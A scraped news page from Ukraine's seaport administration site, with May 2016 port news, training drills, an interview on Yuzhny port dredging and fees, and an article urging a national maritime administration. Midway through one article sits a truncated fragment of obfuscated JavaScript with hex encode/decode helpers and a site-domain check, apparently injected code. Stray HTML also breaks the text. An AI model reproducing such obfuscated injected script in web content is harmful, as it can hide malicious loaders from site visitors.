Оброблено суден: 30

Про підприємство

kiev 109

Державне підприємство «Адміністрація морських портів України» є державним унітарним підприємством і діє, як державне комерційне підприємство, створене відповідно до Закону «Про морські порти України» № 4709-VI від 17.05.2012 р.

Відповідно до розпорядження Кабінету Міністрів України від 4 березня 2013 р. № 133-р «Про погодження пропозиції щодо реорганізації державних підприємств морського транспорту», а також згідно з наказом Міністерства інфраструктури № 163 від 19.03. 2013 р. «Про заходи щодо реорганізації державних підприємств морського транспорту, і створення державного підприємства «Адміністрація морських портів України» входить до сфери управління Міністерства інфраструктури України.
ДП «АМПУ» зареєстровано в Єдиному державному реєстрі юридичних осіб та фізичних осіб-підприємців 27.05.2013 р.
ДП «АМПУ» представляє собою унітарне підприємство, засноване на праві господарського ведення, що складається з центрального апарату (м. Київ), головного представництва (м. Одеса), 13 філій в морських портах України, філії «Дельта-лоцман», Морської пошуково-рятувальної служби та налічує більше 8 000 працівників.

Новини галузі

Електронний документообіг в портах України, який впроваджується в рамках Інформаційної системи портового співтовариства (ІСПС), дозволяє спростити виконання операцій з документами для експедиторів, стивідорів, митниці та агентів. Про це 26 травня під час п'ятнадцятої міжнародної конференції «Зерновий форум & Maritime days 2016» в своїй доповіді повідомив заступник глави ДП «Адміністрація морських портів України» В'ячеслав Вороной. Він уточнив, що в рамках пілотного проекту через ІСПС вже можна оформити електронну залізничну накладну, електронний вантажний ордер/заявку, електронний пропуск, приймальний акт, приходу судна, доручення на навантаження, узгодження на навантаження, а також узгодження митниці. В. Вороной поінформував, що за допомогою системи електронного документообігу експедитор отримує дозвіл митниці на вивантаження вантажу з вагона на склад стивідору ще до моменту прибуття вантажу в порт. «Також він може оформляти на митниці прибуття вантажу в пункт пропуску віддалено, автоматично формувати доручення з заявки, приймального акту і залізничної накладної, віддалено отримувати дозвіл митниці на навантаження судна»,— додав заступник голови АМПУ. Крім того, В. Вороной повідомив, що з впровадженням ІСПС стивідор може отримувати дозвіл митниці на вивантаження вантажу з вагону на склад до моменту прибуття вантажу в порт, оформити приймальний акт і вантажний список автоматично віддалено, вести легітимний електронний облік вантажів. www.apk-inform.com
В Одесі 26 травня відкрилася 15-а міжнародна галузева конференція «Зерновий форум & Maritime days 2016». Участь в ній візьмуть понад 450 представників зернового, логістичного та інших бізнес-сегментів з 28 країн світу, повідомляє АПК-Інформ. Форум триватиме два дні. Учасники обговорять перспективи світового ринку зерна в 2015/16 МР, особливості торгівлі в світлі військових конфліктів і санкцій, роль України на світовому ринку зерна, стан і перспективи розвитку зернової логістики, формування об'єднаних експортних партій зерна на елеваторах, розвиток малотоннажної перевалки та інші теми. Як повідомив на форумі виконавчий директор Міжнародного фонду Блейзера Олег Устенко, статистика показує, що економіка України «пройшла дно» (+0,1% до ВВП в першому кварталі) і в подальшому повинна зростати. В цілому ж в світі зростання економіки сповільнюється і в 2016 році складе 3%, зазначив Устенко. cfts.org.ua
Першим заступником міністра призначено Євгена Кравцова, який раніше працював на посаді в.о. голови ПАТ Укрзалізниця. Міністр інфраструктури України Володимир Омелян сьогодні, 24 травня, на зустрічі з міжнародними донорами України представив нову команду міністерства, повідомляє Центр Транспортних Стратегій. Першим заступником міністра призначено Євгена Кравцова, який зараз є членом правління ПАТ Укрзалізниця. Він виконував обов'язки голови УЗ після відходу з цієї посади Олександра Завгороднього і до приходу нового керівника Войцеха Бальчуна. На новій посаді Кравцов відповідатиме за загальну стратегію розвитку, а також за реформи залізниці та водного транспорту, автодорожню реформу, авіаперевезень, а також реформу Укрпошти. Крім того, міністр представив своїх заступників Юрія Лавренюка і Дмитра Роменського, які вже призначені Кабміном. Перший відповідає в відомстві за боротьбу з корупцією, другий — керівник апарату. Були представлені також двоє майбутніх заступників: Віктор Довгань, який займатиметься питаннями євроінтеграції, і Надія Казначеєва — буде відповідати за приватизацію. Міністерство виділило п'ять основних векторів роботи: продовження реструктуризації Укрзалізниці, реорганізація Адміністрації морських портів, децентралізація в дорожній сфері, корпоратизація Укрпошти та реалізація угоди про Асоціацію з Євросоюзом. Відзначається, що в пріоритетах Мінінфраструктури — боротьба з корупцією, курс на прозору приватизацію і підвищення ефективності роботи. biz.liga.net
 Конкурс професійної майстерності серед працівників загону пожежної безпеки пройшов 20 травня. За звання «кращий» пожежні боролися у конкурсі «багатоборство пожежного». У змаганнях взяли участь 11 пожежних. Конкурс включав 4 види завдань, максимально наближених до реальних надзвичайних ситуацій. Перше завдання – «підйом по підвішеній штурмовій драбині у вікно 4-го поверху навчальної вежі». Кращий результат у цьому завданні продемонстрував пожежний Невестенко Денис. У завданні «підйом по встановленій трьохколінній драбині у вікно 3-го поверху навчальної вежі» кращу професійну майстерність показав пожежний Бугайчук Іван. Наступним завданням було «в'язання подвійної рятувальної петлі з одяганням її на потерпілого пожежним», на якого було вдягнено ізолюючий апарат. Швидше за всіх з цим завданням впорався Бугайчук Іван. У завданні на швидкість «прокладення рукавної лінії від розгалуження» кращу професійну майстерність показав переможець у першому завданні пожежний Невестенко Денис. За загальним підсумком конкурсу по бальний системі кращим пожежним підприємства у 2016 році став Юрій Веселов. Друге місце розділили пожежні — Невестенко Денис і Бугайчук Іван. Члени журі оцінили високий рівень підготовки усіх учасників і швидкість виконання конкурсних завдань. Самі ж конкурсанти впевнені, що запорука успіху – це щоденні тренування. А подібні змагання допомагають на належному рівні підтримувати професійні навички і майстерність. Директор ДП «МТП «Южний» Олександр Лагоша: «Від професійності пожежних залежить життя людини. Саме тому ми приділяємо велику увагу пожежній безпеці на підприємстві. А цьогорічні змагання ще раз довели, що наша високопрофесійна пожежна команда завжди готова до будь-яких випробувань». Начальник загону пожежної безпеки (ЗПБ) ДП «МТП «Южний» Олександр Сергєєв: «Завдання у конкурсі були складними. Щоб виконувати їх на «відмінно», потрібні місяці і навіть роки тренувань. Наші пожежні – найкращі і вони знову це довели». // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "uspa.gov.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Вже найближчими роками Україна може зробити морську галузь блискучою. Про це заявив міністр інфраструктури України Володимир Омелян під час зустрічі із колективом Миколаївського морського порту, яка відбулась 21 травня 2016 року в рамках робочого візиту міністра до Миколаївської області.«Для цього є всі передумови: інтерес іноземних інвесторів, високоякісні фахівці, а головне — бажання і воля»,— заявив В. Омелян. Міністр наголосив, що питання майбутнього розвитку морських портів вирішуватиметься виключно після обговорення з представниками трудових колективів, громадськості та органів державної влади. За словами В. Омеляна, в рамках децентралізації до наглядової ради порту мають увійти представники місцевих громад, центральних органів влади та співробітники порту. «Таким чином кожен робітник буде зацікавлений у розвитку порту та галузі загалом»,— підкреслив міністр. mtu.gov.ua

Новини АМПУ

26 травня в морському порту Рені пройшли масштабні планові навчання з відпрацювання взаємодії рятувальників під час аварійного розливу нафтопродуктів з судна «Ірида» в районі 20–21 причалів. У навчаннях взяли участь екіпажі суден портового флоту: пожежно-рятувальне судно «Смєлий»; «Арктур» і нафтосміттєзбирач «Сборщик 5». Під час навчань були відпрацьовані дії з ліквідації умовного розливу нафтопродуктів в акваторії морського порту. «Боновими» загородженнями т/х «Арктур» локалізував частину акваторії порту на якій, за легендою навчань, стався аварійний розлив нафтопродуктів. Силами екіпажів т/х «Смєлий» і «Сборщик 5» була оперативно ліквідована надзвичайна ситуація. Під час проведення аварійно-рятувальних дій, екіпажі суден проявили високий рівень підготовки та професіоналізму. При тривозі «Людина за бортом», дії екіпажу т/х «Сміливий» були точними і скоординованими. Умовному «потерпілому» надано першу медичну долікарську допомогу. Показаний високий рівень виконання дій екіпажами і суднами під час навчань з надзвичайної ситуації, питання і зауваження відсутні.
Учасники зібрання обговорили пропозиції щодо розвитку стратегії морського та річкового транспорту, а також реформування та удосконалення існуючої структури ДП «АМПУ». Крім того, члени Ради порту з'ясували умови проведення габаритно-вагового контролю транспортних засобів на автошляхах, з урахуванням вимог постанови Кабміну від 21.10.2015 № 869. За результатами засідання члени наради домовилися надсилати свої пропозиції до адміністрації Миколаївського порту для їх опрацювання. Нагадаємо, що Ради порту — постійно діючий дорадчо-консультаційний орган, основним завданням якого є координація питань, пов’язаних із розвитком та функціонуванням морського порту. До складу Ради порту входять начальник та капітан морського порту, представники власників (користувачів) морських терміналів, стивідорних компаній, інших суб’єктів господарювання, що надають послуги у морському порту. Раду порту очолює начальник морського порту, який забезпечує організацію її роботи. Рада порту розглядає зміни та доповнення до плану розвитку порту, зводу звичаїв морського порту та постанов по порту і приймає відповідне рішення щодо доцільності їх внесення.
В адміністрації Іллічівського морського порту пройшла чергова зустріч з потенційними підрядниками на проведення робіт з модернізації та встановлення систем радіологічного контролю. Серед гостей були присутні представники американської компанії «Дабл Ю Джи Ай Глобал Інк.», фахівці з проектування і відеоспостереження, а також представники інших потенційних підрядних організацій. Мета візиту — обговорення технічних питань для підготовки робіт з модернізації та встановлення систем радіологічного контролю. Нагадаємо, що раніше представники іноземної делегації вже відвідували Іллічівський морський порт. Українській стороні було запропоновано спільну співпрацю, в рамках якої ініційована розробка єдиного механізму установки і модернізації комплексів автоматизованого контролю за переміщенням радіоактивних речовин і ядерних матеріалів в Іллічівському морському порту. Слід зазначити, що ініціатором цих робочих зустрічей виступає адміністрація Державної прикордонної служби України. В рамках візиту обговорювалися питання обсягів і термінів робіт з проведення реконструкції інфраструктури Іллічівського морського порту, модернізації існуючих комплексів автоматизованого контролю за переміщенням радіоактивних речовин і ядерних матеріалів «Янтар» і встановленню додаткових портальних моніторів. По завершенню зустрічі, американська сторона запевнила представників Іллічівського морського порту, що найближчим часом буде розроблена проектна документація на установку і модернізацію автоматизованих комплексів контролю імпортних та експортних вантажів для подальшої організації та проведення електронних торгів. Прес-центр адміністрації Іллічівського морського порту
У нараді взяли участь керівники адміністрації, представники державних і приватних портових операторів, які здійснюють свою діяльність на території Іллічівського морського порту, а також профспілкові лідери. Захід розпочався з обговорення доцільності створення Морської адміністрації, з подальшою передачею їй функцій, не властивих ДП «АМПУ». Створення нового виконавчого органу передбачає і внесення змін до Закону «Про транспорт», Закон «Про морські порти України» та інші нормативні документи. За одностайною думкою всіх учасників портового співтовариства, створення Морської адміністрації вирішить проблему звільнення адміністрації порту від невластивих їй функцій. «Якщо Морська адміністрація візьме на себе частину функціоналу ДП «АМПУ», це не тільки дозволить позбутися від дублювання її функцій різними організаціями. Створення нового ефективного органу виконавчої влади сприятливо відіб'ється на діяльності філій і значно спростить громіздкий на сьогодні документообіг»,— зазначив начальник адміністрації Іллічівського морського порту, голова Ради порту Геннадій Скворцов. Всі портові оператори, присутні на нараді, одноголосно підтримали пропозицію про створення Морської адміністрації. Представники портового співтовариства також висловили думку про доцільність децентралізації філій ДП «АМПУ». В рамках виконання плану розвитку обговорювався ключовий для порту питання днопоглиблення і не менш важливе питання землевідведення, від рішення якого безпосередньо залежить реконструкція причалів. В ході наради було заслухано доповідь головного інженера адміністрації Іллічівського морського порту Владислава Гамова. Керівник дав оцінку стану виконання Плану розвитку морського порту Іллічівськ. За словами В. А. Гамова, головні проблеми на сьогоднішній день — це недостатнє фінансування і вкрай тривала процедура узгодження проектів розвитку. На підтримку його слів виступив начальник адміністрації Іллічівського морського порту Геннадій Скворцов. «З огляду на те, що більше 70% доходів, і відповідно, прибутку, підприємство отримує за рахунок портових зборів, використання яких має цільовий характер і повинна бути спрямована виключно на утримання і розвиток стратегічних об'єктів портової інфраструктури, необхідно ініціювати скасування норми перерахування 75% дивідендів до бюджету. Це дасть можливість порту розвиватися»,— підкреслив керівник. Нагадаємо, Постановою КМУ від 30.12.2015 № 1156 уряд збільшив норму відрахувань частки прибутку державними унітарними підприємствами до державного бюджету з 30% до 75%. Як зазначив головний інженер адміністрації Іллічівського морського порту, через невиконання термінів узгодження проектної документації в різних міністерствах і відомствах зривається і виконання вкрай важливих для порту проектів. У зв'язку з цим, на думку голови Ради порту Геннадія Скворцова, необхідно встановити жорсткий контроль за чітким дотриманням термінів узгоджувального регламенту і визначити осіб, відповідальних за його виконання. «Проект, розроблений 2 роки тому, застаріває, його з плином часу треба коригувати. У той же час, затверджена експертиза діє всього 3 місяці. Доводиться знову проходити тривалий шлях узгодження. Цей процес не дозволяє порту розвиватися»,— пояснив керівник. Також, в ході заходу обговорювалися принципи і умови, при яких можлива приватизація порту. На думку начальника юридичної служби Олени Кушнірук, найбільш прийнятною на сьогоднішній день для Іллічівського морського порту є концесія. У той же час, на загальну думку керівництва адміністрації, в рамках визначення форм державно-приватного партнерства найбільш важливим аспектом є соціальна відповідальність. Крім того, представники портових операторів, що працюють на території Іллічівського морського порту, обговорили питання компенсаційної основи бізнесу. На думку присутніх, для вирішення даного питання необхідно розробити механізм компенсації інвестицій відповідно до ст. 27 Закону «Про морські порти України». На підтримку сказаного, голова Профспілки працівників морського транспорту Сергій Бризгалов підкреслив, що профспілкова організація зі свого боку підтримає і допоможе відпрацювати алгоритм дій спільно з представниками портових операторів. «Упевнений, що колективна думка може впливати на вищі органи. Якщо сьогодні не ініціювати вирішення проблемних питань, спільних для нас з вами, то прогресу в розвитку державно-приватного партнерства не буде. Тільки спільними зусиллями ми можемо змінити ситуацію і домогтися прийняття прогресивних рішень з боку державної влади. Тоді і порт, і бізнес будуть розвиватися, що, в кінцевому рахунку, принесе в бюджет свої дивіденди»,— підвів підсумки наради голова Ради Іллічівського морського порту Геннадій Скворцов. Прес-центр адміністрації Іллічівського морського порту
25 травня в приміщенні морської галереї пасажирського комплексу Одеського порту стартував семінар з охорони праці. На цей захід делегували своїх фахівців 15 філій ДП «АМПУ», 10 держпідприємств з числа державних портових стивідорів і 29 приватних стивідорних компаній. У роботі семінару беруть участь головний спеціаліст Департаменту безпеки на морському транспорті Міністерства інфраструктури Ігор Макаренко, представники центрального апарату ДП «АМПУ», обласного управління Державної служби України з питань праці, регіональної виконавчої дирекції Фонду соціального страхування від нещасних випадків на виробництві, профспілкових об'єднань на морському транспорті, ДП «УкрНДІМФ». У ролі модератора виступив начальник служби охорони праці ДП «АМПУ» Юрій Яковищенко. Семінар відкрився доповіддю І.Макаренка «Здійснення Міністерством інфраструктури повноважень в сфері охорони праці». Зокрема, Ігор Михайлович торкнувся проблеми звуження законодавчої і нормативної бази забезпечення виконання норм безпеки праці. Застарілі інструкції, що дісталися в спадок від радянської епохи, будуть скасовані. Які нормативні акти прийдуть їм на зміну — в органах держуправління однозначної думки поки немає. Представник міністерства закликав учасників семінару, як практиків, що глибоко знають проблематику галузі, проявити законотворчу ініціативу. Висловлені І.Макаренком думки про роль і місце фахівця охорони праці на виробництві викликали жваву дискусію серед учасників семінару. Як зміцнити в компанії авторитет інженера з охорони праці? Свої варіанти відповідей на це питання представили Ігор Прус (Держслужба з питань праці), Василь Решетченко (Фонд соціального страхування від нещасних випадків) і ряд інших виступаючих. У перший день роботи на семінарі розглядалися питання контролю за дотриманням вимог безпеки праці з боку профспілок, профілактики професійних захворювань, організації та проведення психофізіологічної експертизи для працівників і ряд інших. Для ознайомлення учасників семінару представили зразки своєї продукції цех з пошиття спецодягу Ізмаїльської філії ДП «АМПУ» та ТОВ «Восток-сервіс» (індивідуальні засоби захисту). 26 травня, семінар продовжить роботу. Прес-служба адміністрації Одеського морського порту

Аналітика

Начальник администрации порта «Южный» Максим Широков в интервью журналу «Порты Украины» объяснил, почему портовые сборы на его предприятии самые высокие на Черном море, как порт зарабатывает и каким образом собирается достичь перевалки в 120 млн тонн О глубинах Мы понимали, что портовые сборы в «Южном» самые высокие среди украинских портов, да и на Черном море. Даже при скидке в 50% мы не очень конкурентны. Тем не менее, суда к нам шли, государственный портовый оператор, частные терминалы ТИС, «Бориваж», «Дельта-Вилмар» наращивали грузопотоки, строили планы расширения, возводился терминал «Олсидз Блэк Си» и т. д. Мы видели, что высокие портовые сборы не останавливали грузовладельцев, всех привлекали глубины. На эту особенность «Южного» и сделали ставку. Было решено просчитать эффект глубины на всей акватории и на этой основе сформировать планы развития, выяснить, при каких условиях высокие сборы будут для судовладельца или грузовладельца приемлемыми. Почти два года вместе со специалистами ЧерноморНИИпроекта исследовали и анализировали всю акваторию, привлекали к работе всех портовых операторов, планы которых также учитывались. Это был серьезный коллективный труд, результат которого — ТЭО перспективного дноуглубления акватории морского порта «Южный» — сейчас находится в профильном министерстве на согласовании в преддверии утверждения на Кабмине. Это четкая стратегия развития на 20 лет вперед — где копать, сколько копать, до каких глубин, какие могут быть причалы, какую номенклатуру грузов они могут переваливать. Мы с наукой просчитали, что на определенных глубинах и с дополнительным причальным фронтом в 6 км порт может переваливать 120 млн тонн навала и генеральных грузов плюс 10 млн тонн нефти. Сделали эту работу и поняли, куда нам двигаться, чтобы не шататься из стороны в сторону. Мы увидели запас прочности порта, назвали конкретную цель – 120 млн тонн. О портовых сборах По доходам. Как только после первого этапа дноуглубления в 2014 году от причалов государственного портового оператора отошел первый груженный до осадки в 18,5 м кейпсайз, в силу вступил мой приказ об отмене скидки в 50% на корабельный и канальный сборы. Несмотря на жалобы, что в порту «Южный» самые высокие портовые сборы, мы их фактически в два раза увеличили для причалов, где было проведено дноуглубление. Но не потому же, что мы глупцы. Все просчитали и показали расчеты бизнесу. Раньше у причалов грузили кейпсайз частично, до 14 м, потом догружали до полной осадки на рейде. Сейчас можно полноценно обрабатывать у причала крупнотоннажное судно до 175 тыс. тонн, не неся дополнительные траты на рейдовую перевалку. Если сравнить затраты грузовладельца, то окажется, что сейчас, оплачивая портовые сборы без скидки, он экономит на каждой тонне 70 центов. Более $120 тыс. на судне! Из высоких портовых сборов мы сделали плюс для грузовладельцев и себя. Это и есть эффект глубины. За полтора года, начиная с 1 июля 2014‑го по 31 декабря 2015 года только за счет отмены скидки мы получили дополнительно $22 млн. Всего портовые сборы сегодня приносят порту $71 млн. По нашим оценкам, при полной реализации 20-летнего стратегического плана можно будет получать дополнительно от сборов еще $180 млн в год. Однако с глубиной надо быть аккуратным. Где-то она даст эффект, например, в Ильичевске. А в других портах и не стоит копать. На дноуглубление тратятся большие средства, и если не учесть все нюансы, может случиться, что грузопоток не увеличится. О 2015-м 2015-й однозначно был годом начала инвестиций и развития. В прошлом году на капитальное развитие было выделено 65 млн гривен. Было много работы. Заключили договор с Херсонским судостроительным заводом на строительство нефтемусоросборщика. Приобрели современную мусоросжигательную печь, теплом которой будем отапливать свои помещения. Обновили боновые заграждения. Провели реконструкцию систем молниезащиты. Полностью оборудовали всю акваторию системой видеонаблюдения. У нас сегодня диспетчерская с «глазами». О планах 2016-й – год инвестиционных проектов. Уже в феврале стартовал крупный проект создания нового зернового терминала под грузопотоки компании «Каргилл». Будет продолжена реконструкция морского подходного канала. Планируется его углубить до 21 м, расширить со 180 м до 210 м, местами — до 230 м для безопасной проводки кейпсайзов. В этом году начнутся работы по реконструкции причалов № 5–8, на которых оперирует государственная стивидорная компания. Также планируем построить причал, на котором администрация расположит базу портового флота, возвести второй этаж в админздании, установить гелиопанели на нем… Общая стоимость крупных проектов, которые стартуют в этом году, составляет 8,5 млрд гривен. Нам на этот год выделено 1 млрд гривен, и мы начинаем их осваивать. О подъездных путях Привлечение частных инвестиций в государственную инфраструктуру — непростой вопрос. Его надо решать кропотливо, щепетильно. Объяснять частнику, насколько важно именно для него вкладывать в дороги, ведущие в порт. Показывать расчеты, дать повод для размышлений. Взять паузу, набраться терпения. Да, неприятно знать, что в каждом литре бензина заложен дорожный сбор, и это не сказывается на качестве дорог. Но если надеяться на государство, то будем долго ждать. Вот стивидоры Николаева первыми пришли к тому, чтобы в складчину восстанавливать автодорогу. Процесс идет. Наш 20-летний стратегический план — отправная точка для перспективного развития авто- и железнодорожной инфраструктуры вокруг порта «Южный». Мы это уже начали анализировать. Смотрим, какой запас прочности. Через пять лет в сторону порта будет двигаться не тысяча грузовиков, а 7,5 тысяч. Значит, дорога в сторону «Южного» будет уничтожена. Нужно строить новую. Две полосы не хватит, нужны четыре. И не асфальт класть, а делать бетонку. Предусмотреть отстойники. Этот вопрос надо понимать, и поднимать его на очень серьезную высоту. Задача морской администрации в этом и состоит. О генеральном плане развития порта В марте очередной совет порта рассмотрел вопрос о перспективном развитии автодорожной инфраструктуры. Пригласили на заседание директора института «Укргипробуд» Сергея Гладуна. Будем заказывать институту работу по перспективному развитию автодорожной и железнодорожной инфраструктуры. Надо, чтобы специалисты нам разрисовали, что нужно делать, куда идти с проектами. И тогда мы плавно перейдем к созданию самого главного документа, к которому я и главный инженер администрации Виталий Липский стремимся — генеральному плану развития морского порта «Южный». На этом документе, надеюсь, будет поставлены подписи, печати, которые не допустят потом никаких корректировок, изменений стратегии. Любой, кто бы ни приходил сюда на должность начальника администрации, будет понимать, куда ему нужно двигаться, чтобы порт достиг 120 млн тонн в год. Этот документ мы сможем показывать инвестору и говорить: «Смотри, здесь будет такая глубина, здесь такой причал, а через пять лет сюда проложат новую дорогу». Инвестор будет знать, что его ждет.… Нам потому и трудно привлечь инвестора, что нечего ему предложить. Приблизительно такой план может появиться года через три. Это большая работа. На сегодня все разрозненно, еще все надо собрать воедино. И надо, чтобы частные инвесторы этому плану сказали «да». Беседовала Валентина МИХАЙЛОВА
Отсутствие единого органа, ответственного за морской транспорт, мешает Украине выполнять свои обязательства, уверен замглавы АМПУ Вячеслав Вороной. Международные обязательства требуют от Украины создания единого государственного органа или учреждения, ответственного за исполнение договоров в отрасли морского транспорта. Сейчас функции такого органа распылены между несколькими министерствами и ведомствами. Эксперты ІМО призывают Украину избавиться от дублирования функций морской администрации разными организациями, основать единый правительственный орган в данной сфере и обеспечить его адекватным персоналом и финансированием. Как размывались функции В соответствии с международными конвенциями ООН и Международной морской организации (ІМО) национальная морская администрация – это любой государственный орган или учреждение, созданное государством в соответствии с его законодательством, и несущее, среди прочего, ответственность за исполнение международных договоров в отрасли морского транспорта, а также применение правил и норм, касающихся судов, персонала и береговых объектов, находящихся под юрисдикцией государства. Аналогичные функции возложены на государство и международными договорами в области судоходства по внутренним водным путям. Функции морской администрации Украины исполнялись Министерством инфраструктуры Украины (Министерством транспорта, Министерством транспорта и связи) непрерывно, начиная с 1993 года, через Департамент морского и речного транспорта, Государственный департамент морского и речного транспорта, Главную государственную инспекцию по безопасности судоходства, Государственную администрацию морского и речного транспорта, Государственную службу морского и речного транспорта. В 2013 году, в соответствии с указом бывшего президента Украины, впервые за годы независимости функции морской администрации не были включены в положение о едином (с того времени) органе исполнительной власти на морском и речном транспорте ‒ Государственной инспекции Украины по безопасности на морском и речном транспорте. Это привело к тому, что был утрачен контроль за целевым использованием средств от административного портового сбора, которые, в соответствии с законом, должны были использоваться исключительно для административных функций на морском транспорте. В первую очередь – для исполнения функций морской администрации. А большую часть расходов для обеспечения функций морской администрации сегодня безосновательно несет ГП АМПУ, не являющееся органом или учреждением, обязанным это делать. Передача в 2015 году части функций морской администрации в Государственную службу безопасности на транспорте привела к ослаблению внимания к вопросам мореплавания и упадку этого направления. Прочие функции морской администрации исполняются ныне разными подразделениями Мининфраструктуры, а также ГУ «Госгидрография», ГП «Классификационное общество Регистр судоходства Украины» и Инспекцией по вопросам подготовки и дипломирования моряков. Такое рассредоточение приводит к отсутствию единой позиции по отношению к некоторым сферам деятельности морской отрасли и увеличению времени на принятие решений. А низкий уровень заработной платы в Мининфраструктуры и Государственной службе безопасности на транспорте при том, что уровень зарплат для соответствующих специалистов на рынке очень высок, привели к потере профессиональных кадров. Международные обязательства В декабре 2013 года был принят Кодекс по исполнению документов ІМО. Среди них: 1. Международная конвенция по охране человеческой жизни на море 1974 года с поправками (конвенция СОЛАС 1974 года). 2. Протокол 1978 года к Международной конвенции по охране человеческой жизни на море 1974 года с поправками (конвенция СОЛАС 1978 года). 3. Протокол 1988 года к международной конвенции по охране человеческой жизни на море 1974 года с поправками (СОЛАС протокол 1988 года). 4. Международная конвенция по предотвращению загрязнения с судов 1973 года, исправлена протоколом 1978 года к ней (конвенция СОЛАС 1974 года). 5. Протокол 1997 года об изменении Международной конвенции по предотвращению загрязнения с судов 1973 года, исправленной протоколом 1978 года к ней (МАРПОЛ протокол 1997 года). 6. Международная Конвенция о подготовке и дипломировании моряков и несении вахты 1978 года с поправками (Конвенция ПДНВ 1978 года). 7. Международная конвенция о грузовой марке 1966 года (Конвенция ГМ 1966 года). 8. Протокол 1988 года к Международной конвенции о грузовой марке 1966 года (ГМ Протокол 1988 года). 9. Международная конвенция об обмеривании судов 1969 года (Конвенция ОС 1969 года). 10. Конвенция о Международных правилах предотвращения столкновений судов на море 1972 года с поправками (Конвенция МППСС 1972 года). Основная особенность этого кодекса – обязательность с 1 января 2016 года норм, которыми должны руководствоваться правительства государств-членов. Это положение одновременно внесено в ряд международных конвенций, стороной которых является Украина (Международную конвенцию о грузовой марке 1966 года, Международную конвенцию об обмериваниии судов 1969 года, Конвенцию о международных правилах предотвращения столкновения судов на море 1972 года). Принятию этого кодекса предшествовала просьба комиссии ООН в адрес ІМО разработать мероприятия, которые позволили бы обеспечивать полное исполнение государствами флага конвенций ІМО, участниками которых они являются, для того чтобы суда этих государств соответствовали международным правилам и нормам безопасности судоходства. Необходимая реформа В Украине создалась крайне сложная ситуация с исполнением международных обязанностей в отрасли судоходства при том, что обязательный контроль со стороны международных организаций существенно усиливается. В 2015 году состоялась консультативная миссия ІМО по поводу готовности Украины к исполнению упомянутого кодекса. Эксперты ІМО четко определили, что Украине необходимо избавиться от дублирования функций морской администрации разными организациями, ей необходимо основать единый правительственный орган – морскую администрацию – и обеспечить ее адекватным персоналом и финансированием. Проведенный анализ решения подобных вопросов как в соседних, так и в более удаленных странах (Грузии, Латвии, Литве, Эстонии, Молдове, России, Испании, Бельгии, Великобритании и других) показал, что в них существуют отдельные органы власти (в составе правительства или отраслевого министерства), которые управляют морским (водным) транспортом. При этом доля государственного сектора в морехозяйственном комплексе обозначенных государств значительно меньше, чем в Украине. С 2010 года в Украине успешно функционирует государственная Авиационная служба Украины, которая является центральным органом исполнительной власти Украины. Таким образом, создание центральным органом исполнительной власти ‒ морской администрации выглядит целиком логично. На морскую администрацию Украины следует возложить и аналогичные функции в отрасли судоходства на внутренних водных путях. Подчинить ее следует министру инфраструктуры. Финансирование этого органа, а также затрат на исполнение международных обязательств Украины по международным договорам в области судоходства должно осуществляться за счет: • средств специального фонда государственного бюджета, сформированных из целевого административного портового сбора; • государственной регистрации судов; • предоставления административных услуг, в том числе выдачи квалификационных документов моряков и удостоверений личности моряка, подтверждения квалификации моряков, выдачи послужных книжек, выдачи удостоверений, свидетельствующих о признании дипломов и прочих. http://ports.com.ua/wp-content/uploads/2016/05/voro-1-154×190.jpg 154w, http://ports.com.ua/wp-content/uploads/2016/05/voro-1.jpg 445w" sizes="(max-width: 477px) 100vw, 477px" style="height: auto; margin-bottom: 10px; max-width: 790px;"> Ожидаемые результаты В результате передачи функций контроля, надзора за безопасностью судоходства морской администрации у службы капитанов морских портов ГП «АМПУ» должны остаться лишь функции обеспечения безопасности судоходства, а именно: • обеспечение соблюдения требований касательно порядка захода судов в морской порт и выхода из морского порта; • обеспечение соблюдения требований касательно предотвращения загрязнения окружающей природной среды; • координация лоцманской службы и службы регулирования движения судов в пределах акватории морского порта; • обеспечение ледовой проводки судов на подходах к морскому порту и в пределах его акватории; • мониторинг надлежащего технического состояния и функционирования причалов, в том числе швартовного и отбойного оборудования, средств навигационного оснащения в порту и на подходах к нему; • предоставление капитанам судов, готовящихся к выходу из порта, навигационной и гидрометеорологической информации по запросу; • оформление прихода судов в морской порт и выхода из морского порта; • выдача разрешений на поднятие затонувшего в море имущества, а также на проведение строительных работ касательно гидротехнических сооружений в пределах территории и акватории морского порта; • участие в расследовании аварийных морских событий; • руководство службой капитана морского порта; • предоставление справок капитану судна, физическим и юридическим лицам, необходимых для оформления морского протеста; • согласование обязательных постановлений по порту, относящихся к компетенции капитана порта; • определение типов судов, которые могут заходить в акваторию порта в период зимней навигации без ограничений; • установление предельной скорости движения судов на подходном канале и в портовой акватории в зимний период; • установление проходной осадки; • согласование технических заданий на дноуглубительные работы и планов и их выполнения; • объявление о начале или конце ледовой кампании в акватории порта.
36 крупнейших украинских экспортеров продовольствия: список тех, кто заводит в страну валютную выручку Каждый третий доллар, завезенный в Украину, получен от экспорта сельхозпродукции. Эта избитая фраза уже порядком надоела не только слушателям аграрных конференций, но и самим докладчикам. Но из песни слов не выкинешь, и не говорить об этом было бы неправильно. Даже если успешный экспорт продовольствия — то, чем наша страна до сих пор может гордиться, и возможность, которую она еще не упустила, нужно трубить о ней во всеуслышание. Список крупнейших экспортеров аграрной продукции — один из ключевых рейтингов журнала Landlord. Кроме того, экспорт — наша излюбленная тема. В каждом номере мы так или иначе затрагиваем ее: в аналитике, историях успеха или рубрике «Разговор». Мы не могли отказать себе в удовольствии посвятить международной торговле целую тему номера.Авторы: Дария Исакова и Ольга Дружерудченко Как мы считали? Лонг‑лист составляли, опираясь на данные ГП «Держзовнишинформ» — нашего информационно-аналитического партнера. Показатель — объем экспорта в денежном выражении по итогам 2015 года. Каждая компания из рейтинга имела возможность ознакомиться с цифрой и скорректировать ее при необходимости — всем фигурантам списка была отправлена специальная анкета. В рейтинг вошли компании, экспортирующие подсолнечное масло, зерно, мясо, молочные и готовые пищевые продукты. Компании, экспортирующие удобрения и средства защиты растений, в рейтинг не вошли. Также в список не включали посредников, предоставляющих услуги по перевалке и перевозке продукции. Рейтинг отражает интересные тенденции. Например, группа «Креатив» несколько лет подряд была одним из лидеров по объемам экспорта масла. С марта 2015‑го — из‑за финансовых проблем и невозможности погасить долги компания остановила внешние продажи. № 1 «Кернел» № 2 Нибулон № 3 ГПЗКУ (Государственная продовольственно-зерновая корпорация Украины) № 4 «Мироновский хлебопродукт» № 